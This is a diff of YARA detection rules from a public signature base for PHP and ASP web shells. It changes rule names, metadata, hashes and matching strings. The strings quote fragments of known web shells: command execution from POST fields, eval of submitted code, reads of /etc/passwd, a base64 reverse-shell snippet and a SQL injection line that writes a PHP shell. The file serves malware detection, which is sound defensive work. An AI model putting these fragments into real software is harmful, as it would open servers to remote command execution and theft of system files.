 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"
-		logic_hash = "0cb8851285bd55b0b613ec4c46ab88142e2cbba7e527ad510b008cfb342af221"
+		logic_hash = "0a63d3b00ad9719140da9bb5dcb49981c4d3758fac13c392d016b47e54f356c8"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword
-		$s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword
-		$s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword
-		$s12 = "while (($ekinci=readdir ($sedat))){" fullword
-		$s19 = "$deger2= \"$ich[$tampon4]\";" fullword
+		$s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword
+		$s4 = "\\$port = {$_POST['port']};"
+		$s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword
+		$s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"
+		$s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"
 
 	condition:
-		2 of them
+		4 of them
 }
-rule SIGNATURE_BASE_Webshell_B374K_Php
+rule SIGNATURE_BASE_Webshell__Crystalshell_V_1_Erne_Stres
 {
 	meta:
-		description = "PHP Webshells Github Archive - file b374k.php.php"
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "73eb7d8d-14bb-5bc2-90b2-90b6bd603bd1"
+		id = "4e73e42e-b968-5b68-a00d-d2a8a1f3541c"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5723-L5738"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6952-L6973"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "04c99efd187cf29dc4e5603c51be44170987bce2"
-		logic_hash = "f44ecdcf327cf417a90a91c8d23f6137b80c2006bea2ca2e214f2bfdf5793771"
+		logic_hash = "a0484a5a71715d6a79c89e20919ab89aaa7e85a18ee502651f1f6b29153847a3"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"
+		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
-		$s6 = "// password (default is: b374k)"
-		$s8 = "//******************************************************************************"
-		$s9 = "// b374k 2.2" fullword
-		$s10 = "eval(\"?>\".gzinflate(base64_decode("
+		$s1 = "<input type='submit' value='  open (shill.txt) '>" fullword
+		$s4 = "var_dump(curl_exec($ch));" fullword
+		$s7 = "if(empty($_POST['Mohajer22'])){" fullword
+		$s10 = "$m=$_POST['curl'];" fullword
+		$s13 = "$u1p=$_POST['copy'];" fullword
+		$s14 = "if(empty(\\$_POST['cmd'])){" fullword
+		$s15 = "$string = explode(\"|\",$string);" fullword
+		$s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword
 
 	condition:
-		3 of them
+		5 of them
 }
-rule SIGNATURE_BASE_Webshell_Simattacker___Vrsion_1_0_0___Priv8_4_My_Friend
+rule SIGNATURE_BASE_Webshell_Generic_PHP_3
 {
 	meta:
-		description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+		description = "PHP Webshells Github Archive"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3e0bae7d-77a1-5439-bbe7-177bec23cea0"
+		id = "ff7c6534-efcf-565e-bfc0-1eaa2e9d7b7d"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5739-L5756"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6974-L6993"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"
-		logic_hash = "63ebb0c673a5aee05d2d9d571ebf63942d826b5148a5f7ed587ba1efbb0dc923"
+		logic_hash = "5c264a294fc75cf2cadd3dba61bc64658989ffe5ddecfa18ba18e66492ad3c71"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"
+		hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"
+		hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"
+		hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"
 
 	strings:
-		$s4 = "&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword
-		$s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
-		$s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword
-		$s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
-		$s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
-		$s19 = "$Comments=$_POST['Comments'];" fullword
-		$s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword
+		$s0 = "header('Content-Length:'.filesize($file).'');" fullword
+		$s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"
+		$s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword
+		$s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword
+		$s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi_2 : FILE
+rule SIGNATURE_BASE_Webshell_Generic_PHP_4
 {
 	meta:
-		description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
-		author = "Florian Roth"
-		id = "252ecc2c-83e3-5ca5-a86a-caf76e63e79c"
-		date = "2014-04-06"
-		modified = "2025-03-21"
-		old_rule_name = "WebShell_h4ntu_shell__powered_by_tsoi_"
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2932cb85-927e-536b-b8d8-a0ac0d1ef8ec"
+		date = "2025-03-29"
+		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5758-L5773"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6994-L7016"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"
-		logic_hash = "c731f2f430e61277ec6c8e292aa50a31eea46fe67eb455811b3fbe9e8967a8c1"
+		logic_hash = "18db4c6728f0575b4d8388dab9563ee98ca9aa5fdc8534bf76856a87820b4596"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"
+		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s1 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
-		$s2 = "$uname = posix_uname( );" fullword
-		$s3 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
-		$s4 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"
+		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+		$s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword
+		$s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword
+		$s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword
+		$s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword
+		$s10 = "foreach ($arr as $filename) {" fullword
+		$s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword
 
 	condition:
-		filesize < 2MB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Myshell
+rule SIGNATURE_BASE_Webshell_GFS
 {
 	meta:
-		description = "PHP Webshells Github Archive - file MyShell.php"
+		description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "bde6cfd8-466f-528a-b1e3-f874aa778010"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5775-L5793"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7018-L7034"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"
-		logic_hash = "2c39ffecb44ce2f936ba3563c6086d8b2ed75aec3b57b45e2a1f5e7321ac9a3f"
+		logic_hash = "72a3f117cb11e1461b760c47a3de74283640b6e1daa87b24e45210213bb76609"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"
+		hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"
+		hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"
 
 	strings:
-		$s3 = "<title>MyShell error - Access Denied</title>" fullword
-		$s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword
-		$s5 = "//A workdir has been asked for - we chdir to that dir." fullword
-		$s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
-		$s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
-		$s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
-		$s19 = "#every command you excecute." fullword
-		$s20 = "<form name=\"shell\" method=\"post\">" fullword
+		$s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword
+		$s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword
+		$s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Pws
+rule SIGNATURE_BASE_Webshell__Crystalshell_V_1_Sosyete_Stres
 {
 	meta:
-		description = "PHP Webshells Github Archive - file pws.php"
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "774f7f4c-724a-5eb0-b5de-44b389fd593d"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5794-L5810"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7035-L7055"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"
-		logic_hash = "4b2eeb80200cc5dffa80cddc74f1902c0e8a5d2313d9a20d02eeb99ccb668ec0"
+		logic_hash = "78aeabe38f7457060d81c3863098b5e424bc38f13e9e86bbb6ea54827f27afcd"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"
+		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s6 = "if ($_POST['cmd']){" fullword
-		$s7 = "$cmd = $_POST['cmd'];" fullword
-		$s10 = "echo \"FILE UPLOADED TO $dez\";" fullword
-		$s11 = "if (file_exists($uploaded)) {" fullword
-		$s12 = "copy($uploaded, $dez);" fullword
-		$s17 = "passthru($cmd);" fullword
+		$s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword
+		$s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword
+		$s11 = "scrollbar-darkshadow-color: #101842;" fullword
+		$s15 = "<a bookmark=\"minipanel\">" fullword
+		$s16 = "background-color: #EBEAEA;" fullword
+		$s18 = "color: #D5ECF9;" fullword
+		$s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"
 
 	condition:
-		4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Reader_Asp_Php
+rule SIGNATURE_BASE_Webshell_Generic_PHP_10
 {
 	meta:
-		description = "PHP Webshells Github Archive - file reader.asp.php.txt"
+		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80ec18e1-6f41-5188-b2d5-f4228c975fa1"
+		id = "f52013d6-72ce-544c-a7ef-ae2a2ea87108"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5811-L5825"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7056-L7076"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"
-		logic_hash = "6ffda38584b6cdec818af8e09c62bb4a46f40230ffd5c1a68993a91c37f67680"
+		logic_hash = "0bf731edef55cde5d2ad16510fb9f1a240c1a06b535af7e13300fdbea470df74"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+		hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"
 
 	strings:
-		$s5 = "ster\" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail"
-		$s12 = " HACKING " fullword
-		$s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "
-		$s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"
+		$s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword
+		$s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword
+		$s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword
+		$s12 = "else if( $mode & 0xA000 ) " fullword
+		$s17 = "$s=sprintf(\"%1s\", $type); " fullword
+		$s20 = "font-size: 8pt;" fullword
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_3
+rule SIGNATURE_BASE_Webshell_Generic_PHP_11
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"
+		description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "349cf6ac-92b3-59f7-a6e4-c23e69b454c6"
+		id = "590c5320-ef85-5522-94fd-4619749f7eb1"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		old_rule_name = "WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5826-L5843"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7077-L7099"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"
-		logic_hash = "6840af0d9f99277277edce93deb54e9a319c8938169701c89fdeb65207590951"
+		logic_hash = "5a559a26314ce603d6454efb71f1243bf89daed920ca2a495a51b94a4cca0045"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"
+		hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"
+		hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"
+		hash3 = "80aba3348434c66ac471daab949871ab16c50042"
 
 	strings:
-		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
-		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
-		$s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."
-		$s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword
-		$s15 = "if(empty($_GET['file'])){" fullword
-		$s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword
+		$s5 = "$filename = $backupstring.\"$filename\";" fullword
+		$s6 = "while ($file = readdir($folder)) {" fullword
+		$s7 = "if($file != \".\" && $file != \"..\")" fullword
+		$s9 = "$backupstring = \"copy_of_\";" fullword
+		$s10 = "if( file_exists($file_name))" fullword
+		$s13 = "global $file_name, $filename;" fullword
+		$s16 = "copy($file,\"$filename\");" fullword
+		$s18 = "<td width=\"49%\" height=\"142\">" fullword
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_2
+rule SIGNATURE_BASE_Webshell__Findsock_Php_Findsock_Shell_Php_Reverse_Shell
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+		description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b647f529-be81-51ad-b671-84aec410e133"
+		id = "6567c8f1-bd7f-5844-b937-3db2d8eb7408"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		old_rule_name = "WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5844-L5860"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7100-L7114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"
-		logic_hash = "92bfac3516a448bbb3e78cf8950c6e816bf35d0ae2f3d32bc9b9b2836309999b"
+		logic_hash = "2459f7114482e17f087bda4b638c29e237f2f3cb5a9e41e326ed65fc1834b6be"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"
+		hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
+		hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
 
 	strings:
-		$s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword
-		$s6 = "$liz0=shell_exec($_POST[baba]); " fullword
-		$s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"
-		$s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword
-		$s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+		$s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Backdoor_2
+rule SIGNATURE_BASE_Webshell_Generic_PHP_6
 {
 	meta:
-		description = "PHP Webshells Github Archive - file php-backdoor.php"
+		description = "PHP Webshells Github Archive"
 		author = "Florian Roth (Nextron Systems)"
-		id = "65e1305b-4fc7-5885-b3df-92846bb57fe3"
+		id = "e61ec617-565a-5b24-82f4-3677ef379a06"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		old_rule_name = "WebShell_php_backdoor"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5861-L5877"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7115-L7136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"
-		logic_hash = "4228bcbfff5d7756615347196270f7916843e2aceacc7298610070b8b923381b"
+		logic_hash = "7b3f2ca3cb9516ddda1b9cac2ca5eb5d9e62e1839dad041f69a3dc7a2a186897"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "1a08f5260c4a2614636dfc108091927799776b13"
+		hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword
-		$s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"
-		$s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword
-		$s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword
-		$s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+		$s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
+		$s5 = "echo shell_exec($com);" fullword
+		$s7 = "if($sertype == \"winda\"){" fullword
+		$s8 = "function execute($com)" fullword
+		$s12 = "echo decode(execute($cmd));" fullword
+		$s15 = "echo system($com);" fullword
 
 	condition:
-		1 of them
+		4 of them
 }
-rule SIGNATURE_BASE_Webshell_Worse_Linux_Shell_2
+rule SIGNATURE_BASE_Unpack_Injectt
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Worse Linux Shell.php"
+		description = "Webshells Auto-generated - file Injectt.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "04ed7464-29d1-54b9-98ff-afc03475b220"
+		id = "80dc3086-41a6-5e30-bbf4-463500fe5e33"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		old_rule_name = "WebShell_Worse_Linux_Shell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5878-L5895"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7138-L7151"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"
-		logic_hash = "6480c524213583511253ea1d37820994bba8a86f58a3775d4a9e4325725289d8"
+		hash = "8a5d2158a566c87edc999771e12d42c5"
+		logic_hash = "d8e9ed4f2604617bd6410f36ab827affa3cc6729ba996d0d9cd9c8eb0fd96533"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword
-		$s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword
-		$s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword
-		$s8 = "$currentCMD = \"ls -la\";" fullword
-		$s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword
-		$s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword
+		$s2 = "%s -Run                              -->To Install And Run The Service"
+		$s3 = "%s -Uninstall                        -->To Uninstall The Service"
+		$s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Phpinj
+rule SIGNATURE_BASE_Hytop_Devpack_Fso
 {
 	meta:
-		description = "PHP Webshells Github Archive - file pHpINJ.php"
+		description = "Webshells Auto-generated - file fso.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "094eeff9-0da0-5a44-a45c-f8ee57861e7a"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5896-L5913"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7152-L7164"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "75116bee1ab122861b155cc1ce45a112c28b9596"
-		logic_hash = "271efaa8f370376f971d3d59256658b341599ac554cc216e09401e44b16bdede"
+		hash = "b37f3cde1a08890bd822a182c3a881f6"
+		logic_hash = "9d071c1e2e0725091a2abe24759e6e71d78e29caa76b4fff77c44e3bb381b1a2"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword
-		$s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword
-		$s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN"
-		$s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword
-		$s14 = "$expurl= $url.\"?id=\".$sql ;" fullword
-		$s15 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword
